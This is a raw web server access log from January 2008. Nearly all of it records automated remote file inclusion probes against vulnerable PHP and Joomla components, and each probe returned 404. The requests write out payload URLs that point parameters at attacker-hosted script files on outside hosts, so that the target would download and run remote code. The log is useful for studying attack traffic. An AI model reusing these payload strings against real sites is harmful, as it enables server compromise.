72.9.145.107 - - [11/Jan/2008:16:47:54 -0800] "GET /logs/access_070912.log/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.mta.cl/galeria2/galery.txt??? HTTP/1.1" 404 337 "-" "libwww-perl/5.808" "www.projectpr.com"
195.15.2.85 - - [11/Jan/2008:16:48:36 -0800] "GET /logs/access.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://forum.juggla.net/images/avatars/.as./figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.projectpr.com"
195.15.2.85 - - [11/Jan/2008:16:48:36 -0800] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://forum.juggla.net/images/avatars/.as./figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.projectpr.com"
66.249.70.107 - - [11/Jan/2008:16:50:19 -0800] "GET /robots.txt HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.projectpr.com"
66.249.70.107 - - [11/Jan/2008:16:50:19 -0800] "GET /clipart/images/ HTTP/1.1" 200 822 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.projectpr.com"
81.169.154.94 - - [11/Jan/2008:16:50:57 -0800] "HEAD / HTTP/1.1" 200 0 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.projectpr.com"
65.74.150.192 - - [11/Jan/2008:16:51:10 -0800] "GET /logs/access_070812.log/index.php?_REQUEST=&_REQUEST[option]=com_phpshop&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://canalpt.net/catalog/images/12.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
83.16.96.219 - - [11/Jan/2008:16:51:16 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://34639.webtest.goneo.de/ultrastats/include/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.projectpr.com"
83.16.96.219 - - [11/Jan/2008:16:51:18 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://34639.webtest.goneo.de/ultrastats/include/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.projectpr.com"
122.132.140.60 - - [11/Jan/2008:16:55:20 -0800] "GET //modules/xfsection/modify.php?dir_module=http://www.shikea.se/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
122.132.140.60 - - [11/Jan/2008:16:58:50 -0800] "GET /logs/access.log//modules/xfsection/modify.php?dir_module=http://www.shikea.se/ids.txt?? HTTP/1.1" 404 291 "-" "libwww-perl/5.805" "www.projectpr.com"
122.132.140.60 - - [11/Jan/2008:16:58:56 -0800] "GET //modules/xfsection/modify.php?dir_module=http://www.shikea.se/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
122.132.140.60 - - [11/Jan/2008:16:59:01 -0800] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.shikea.se/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
217.150.200.101 - - [11/Jan/2008:16:59:34 -0800] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.modem56.info//modules/Downloads/screenshots/ftp.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.projectpr.com"
217.150.200.101 - - [11/Jan/2008:16:59:34 -0800] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.modem56.info//modules/Downloads/screenshots/ftp.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.projectpr.com"
67.15.12.20 - - [11/Jan/2008:17:01:46 -0800] "GET /logs/access_070912.log/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://claroline.lct-net.cl/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
81.169.167.33 - - [11/Jan/2008:17:02:55 -0800] "GET /logs/access_070912.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://misterbit.altervista.org/ftp-r0x/scan/pr.txt? HTTP/1.1" 404 313 "-" "libwww-perl/5.803" "www.projectpr.com"
81.169.167.33 - - [11/Jan/2008:17:02:55 -0800] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://misterbit.altervista.org/ftp-r0x/scan/pr.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
81.169.167.33 - - [11/Jan/2008:17:02:56 -0800] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://misterbit.altervista.org/ftp-r0x/scan/pr.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
195.15.2.85 - - [11/Jan/2008:17:03:22 -0800] "GET /logs/access_070712.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://forum.juggla.net/images/avatars/.as./figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.projectpr.com"
122.153.16.5 - - [11/Jan/2008:17:05:03 -0800] "GET /modules/xfsection/modify.php?dir_module=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
213.194.124.84 - - [11/Jan/2008:17:05:53 -0800] "GET /logs/access_070912.log/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://classico.sinte.com.br/modules/Forums/admin/setup_pages2.txt?? HTTP/1.1" 404 337 "-" "libwww-perl/5.803" "www.projectpr.com"
207.44.188.10 - - [11/Jan/2008:17:06:40 -0800] "GET /ncaster/admin/addons/archive/archive.php?adminfolder=http://www.paradiseradio.org/phpbo.do??? HTTP/1.1" 404 286 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.projectpr.com"
207.44.188.10 - - [11/Jan/2008:17:06:40 -0800] "GET /logs/ncaster/admin/addons/archive/archive.php?adminfolder=http://www.paradiseradio.org/phpbo.do??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.projectpr.com"
62.193.230.39 - - [11/Jan/2008:17:10:15 -0800] "GET /amember/plugins/payment/secpay/config.inc.php?config[root_dir]=http://www.netmeup.ro/components/.../test.txt????? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.projectpr.com"
62.193.230.39 - - [11/Jan/2008:17:10:16 -0800] "GET /logs/amember/plugins/payment/secpay/config.inc.php?config[root_dir]=http://www.netmeup.ro/components/.../test.txt????? HTTP/1.1" 404 296 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.projectpr.com"
195.225.104.33 - - [11/Jan/2008:17:11:43 -0800] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://epr0.kit.net/c?? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.projectpr.com"
81.19.78.111 - - [11/Jan/2008:17:20:29 -0800] "GET /sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://txfishes.com/wikispecies/img/wiki/goid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
202.180.216.12 - - [11/Jan/2008:17:22:45 -0800] "GET /logs/access_070712.log/tools/send_reminders.php?noSet=0&includedir=http://www.sajin88.com/bbs/data1/90.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
202.180.216.12 - - [11/Jan/2008:17:22:49 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.sajin88.com/bbs/data1/90.txt?? HTTP/1.1" 404 270 "-" "libwww-perl/5.805" "www.projectpr.com"
202.180.216.12 - - [11/Jan/2008:17:22:49 -0800] "GET /logs/tools/send_reminders.php?noSet=0&includedir=http://www.sajin88.com/bbs/data1/90.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
207.44.188.10 - - [11/Jan/2008:17:23:37 -0800] "GET /logs//chat/inc/cmses/aedating4CMS.php?dir[inc]=http://www.paradiseradio.org/phpbo.do??? HTTP/1.1" 404 283 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.projectpr.com"
207.44.188.10 - - [11/Jan/2008:17:23:41 -0800] "GET //chat/inc/cmses/aedating4CMS.php?dir[inc]=http://www.paradiseradio.org/phpbo.do??? HTTP/1.1" 404 278 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.projectpr.com"
74.6.19.103 - - [11/Jan/2008:17:24:20 -0800] "GET /navigation_bars/?M=D HTTP/1.0" 200 807 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.projectpr.com"
195.225.104.33 - - [11/Jan/2008:17:25:58 -0800] "GET /logs/access.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://epr0.kit.net/c?? HTTP/1.0" 404 290 "-" "libwww-perl/5.48" "www.projectpr.com"
195.225.104.33 - - [11/Jan/2008:17:25:58 -0800] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://epr0.kit.net/c?? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.projectpr.com"
85.10.138.63 - - [11/Jan/2008:17:26:04 -0800] "GET /logs/access_070912.log/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://carnet.sakura.ne.jp/cscart_dir/skins/echo3? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
85.10.138.63 - - [11/Jan/2008:17:26:09 -0800] "GET /sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://carnet.sakura.ne.jp/cscart_dir/skins/echo3? HTTP/1.1" 404 314 "-" "libwww-perl/5.803" "www.projectpr.com"
85.10.138.63 - - [11/Jan/2008:17:26:14 -0800] "GET /logs/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://carnet.sakura.ne.jp/cscart_dir/skins/echo3? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
85.10.138.63 - - [11/Jan/2008:17:26:54 -0800] "GET /logs/access.log/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://carnet.sakura.ne.jp/cscart_dir/skins/echo3? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
74.53.58.15 - - [11/Jan/2008:17:27:00 -0800] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://epr0.kit.net/c?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
59.106.19.18 - - [11/Jan/2008:17:28:43 -0800] "GET /sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://txfishes.com/wikispecies/img/wiki/goid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
85.10.138.63 - - [11/Jan/2008:17:30:06 -0800] "GET /logs/access_070912.log/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://carnet.sakura.ne.jp/cscart_dir/skins/echo3? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
85.10.138.63 - - [11/Jan/2008:17:30:06 -0800] "GET /sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://carnet.sakura.ne.jp/cscart_dir/skins/echo3? HTTP/1.1" 404 314 "-" "libwww-perl/5.803" "www.projectpr.com"
85.10.138.63 - - [11/Jan/2008:17:30:07 -0800] "GET /logs/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://carnet.sakura.ne.jp/cscart_dir/skins/echo3? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
85.10.138.63 - - [11/Jan/2008:17:30:57 -0800] "GET /logs/access.log/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://carnet.sakura.ne.jp/cscart_dir/skins/echo3? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
64.13.250.115 - - [11/Jan/2008:17:32:49 -0800] "GET /logs/access.log//include.php?path[docroot]=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
64.13.250.115 - - [11/Jan/2008:17:32:49 -0800] "GET //include.php?path[docroot]=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
64.13.250.115 - - [11/Jan/2008:17:32:49 -0800] "GET /logs//include.php?path[docroot]=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
64.13.250.115 - - [11/Jan/2008:17:32:56 -0800] "GET /logs/access_070912.log//include.php?path[docroot]=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
81.19.78.111 - - [11/Jan/2008:17:34:08 -0800] "GET /logs/access_070912.log/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://txfishes.com/wikispecies/img/wiki/goid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
81.19.78.111 - - [11/Jan/2008:17:34:09 -0800] "GET /logs/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://txfishes.com/wikispecies/img/wiki/goid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
81.19.78.111 - - [11/Jan/2008:17:34:09 -0800] "GET /logs/access.log/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://txfishes.com/wikispecies/img/wiki/goid.txt?? HTTP/1.1" 404 330 "-" "libwww-perl/5.805" "www.projectpr.com"
64.13.250.115 - - [11/Jan/2008:17:36:23 -0800] "GET /logs/access.log/skin/zero_vote/login.php?dir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
64.13.250.115 - - [11/Jan/2008:17:36:23 -0800] "GET /skin/zero_vote/login.php?dir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
64.13.250.115 - - [11/Jan/2008:17:36:23 -0800] "GET /logs/skin/zero_vote/login.php?dir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
74.53.58.15 - - [11/Jan/2008:17:37:05 -0800] "GET /logs/access.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://epr0.kit.net/c?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
74.53.58.15 - - [11/Jan/2008:17:37:05 -0800] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://epr0.kit.net/c?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
89.174.96.70 - - [11/Jan/2008:17:38:36 -0800] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://epr0.kit.net/c?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.projectpr.com"
59.106.19.18 - - [11/Jan/2008:17:43:45 -0800] "GET /logs/access_070912.log/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://txfishes.com/wikispecies/img/wiki/goid.txt?? HTTP/1.1" 404 337 "-" "libwww-perl/5.805" "www.projectpr.com"
59.106.19.18 - - [11/Jan/2008:17:43:45 -0800] "GET /logs/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://txfishes.com/wikispecies/img/wiki/goid.txt?? HTTP/1.1" 404 319 "-" "libwww-perl/5.805" "www.projectpr.com"
59.106.19.18 - - [11/Jan/2008:17:43:45 -0800] "GET /logs/access.log/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://txfishes.com/wikispecies/img/wiki/goid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
62.193.216.24 - - [11/Jan/2008:17:45:58 -0800] "GET /checkout.php?abs_path=http://www.netmeup.ro/components/.../test.txt????? HTTP/1.0" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.projectpr.com"
62.193.216.24 - - [11/Jan/2008:17:45:58 -0800] "GET /logs/checkout.php?abs_path=http://www.netmeup.ro/components/.../test.txt????? HTTP/1.0" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.projectpr.com"
85.159.88.66 - - [11/Jan/2008:17:46:10 -0800] "GET /logs/access_070912.log/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://forum.juggla.net/images/avatars/.as./figo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
85.159.88.66 - - [11/Jan/2008:17:46:11 -0800] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://forum.juggla.net/images/avatars/.as./figo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
85.159.88.66 - - [11/Jan/2008:17:46:11 -0800] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://forum.juggla.net/images/avatars/.as./figo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
62.193.248.204 - - [11/Jan/2008:17:46:15 -0800] "GET /logs/access_070912.log/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://216.126.65.86/includes/1d.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
62.193.248.204 - - [11/Jan/2008:17:46:15 -0800] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://216.126.65.86/includes/1d.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
62.193.248.204 - - [11/Jan/2008:17:46:15 -0800] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://216.126.65.86/includes/1d.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
62.193.248.204 - - [11/Jan/2008:17:46:34 -0800] "GET /logs/access_070912.log/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://216.126.65.86/includes/1d.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
62.193.248.204 - - [11/Jan/2008:17:46:34 -0800] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://216.126.65.86/includes/1d.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
62.193.248.204 - - [11/Jan/2008:17:46:35 -0800] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://216.126.65.86/includes/1d.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
62.193.248.204 - - [11/Jan/2008:17:46:38 -0800] "GET /logs/access_070912.log/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://216.126.65.86/includes/1d.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
62.193.248.204 - - [11/Jan/2008:17:46:38 -0800] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://216.126.65.86/includes/1d.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
62.193.248.204 - - [11/Jan/2008:17:46:39 -0800] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://216.126.65.86/includes/1d.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
64.13.250.115 - - [11/Jan/2008:17:51:52 -0800] "GET /logs/access.log//admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
64.13.250.115 - - [11/Jan/2008:17:51:52 -0800] "GET //admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
64.13.250.115 - - [11/Jan/2008:17:51:52 -0800] "GET /logs//admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
85.159.88.66 - - [11/Jan/2008:17:52:06 -0800] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://forum.juggla.net/images/avatars/.as./figo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
64.13.250.115 - - [11/Jan/2008:17:52:12 -0800] "GET /logs/access_070812.log//admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
89.174.96.70 - - [11/Jan/2008:17:52:48 -0800] "GET /logs/access.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://epr0.kit.net/c?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.projectpr.com"
89.174.96.70 - - [11/Jan/2008:17:52:48 -0800] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://epr0.kit.net/c?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.projectpr.com"
208.186.169.183 - - [11/Jan/2008:17:53:41 -0800] "GET /skin/zero_vote/login.php?dir=http://www.ar-vision.com/z.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.projectpr.com"
85.159.88.66 - - [11/Jan/2008:17:56:58 -0800] "GET /logs/access.log/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://forum.juggla.net/images/avatars/.as./figo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
81.19.78.111 - - [11/Jan/2008:17:59:17 -0800] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://txfishes.com/wikispecies/img/wiki/goid.txt?? HTTP/1.1" 404 305 "-" "libwww-perl/5.805" "www.projectpr.com"
74.53.58.15 - - [11/Jan/2008:17:59:58 -0800] "GET /logs/access_070912.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://epr0.kit.net/c?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
208.186.169.183 - - [11/Jan/2008:18:01:57 -0800] "GET //include.php?path[docroot]=http://www.ar-vision.com/z.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.projectpr.com"
72.9.145.107 - - [11/Jan/2008:18:02:00 -0800] "GET /logs/access_070712.log//tools/send_reminders.php?noSet=0&includedir=http://www.mta.cl/galeria2/galery.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
72.9.145.107 - - [11/Jan/2008:18:02:00 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.mta.cl/galeria2/galery.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
72.9.145.107 - - [11/Jan/2008:18:02:00 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.mta.cl/galeria2/galery.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
62.193.248.204 - - [11/Jan/2008:18:02:36 -0800] "GET /logs/access.log/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://216.126.65.86/includes/1d.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
62.193.248.204 - - [11/Jan/2008:18:02:52 -0800] "GET /logs/access.log/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://216.126.65.86/includes/1d.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
208.186.169.183 - - [11/Jan/2008:18:03:02 -0800] "GET /logs/access.log/skin/zero_vote/login.php?dir=http://www.ar-vision.com/z.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.projectpr.com"
208.186.169.183 - - [11/Jan/2008:18:03:02 -0800] "GET /logs/skin/zero_vote/login.php?dir=http://www.ar-vision.com/z.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.projectpr.com"
85.159.88.66 - - [11/Jan/2008:18:03:04 -0800] "GET /logs/access.log/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://forum.juggla.net/images/avatars/.as./figo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
85.159.88.66 - - [11/Jan/2008:18:03:05 -0800] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://forum.juggla.net/images/avatars/.as./figo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
85.159.88.66 - - [11/Jan/2008:18:03:06 -0800] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://forum.juggla.net/images/avatars/.as./figo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
62.193.248.204 - - [11/Jan/2008:18:03:17 -0800] "GET /logs/access.log/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://216.126.65.86/includes/1d.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
81.19.78.111 - - [11/Jan/2008:18:03:54 -0800] "GET /logs/access_070912.log/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://txfishes.com/wikispecies/img/wiki/goid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
81.19.78.111 - - [11/Jan/2008:18:03:55 -0800] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://txfishes.com/wikispecies/img/wiki/goid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
86.109.165.93 - - [11/Jan/2008:18:03:55 -0800] "GET /logs/access.log/skin/zero_vote/login.php?dir=http://tanbebek.com/pitik/id.txt? HTTP/1.1" 404 286 "-" "libwww-perl/5.65" "www.projectpr.com"
86.109.165.93 - - [11/Jan/2008:18:03:56 -0800] "GET /skin/zero_vote/login.php?dir=http://tanbebek.com/pitik/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.projectpr.com"
86.109.165.93 - - [11/Jan/2008:18:03:56 -0800] "GET /logs/skin/zero_vote/login.php?dir=http://tanbebek.com/pitik/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.projectpr.com"
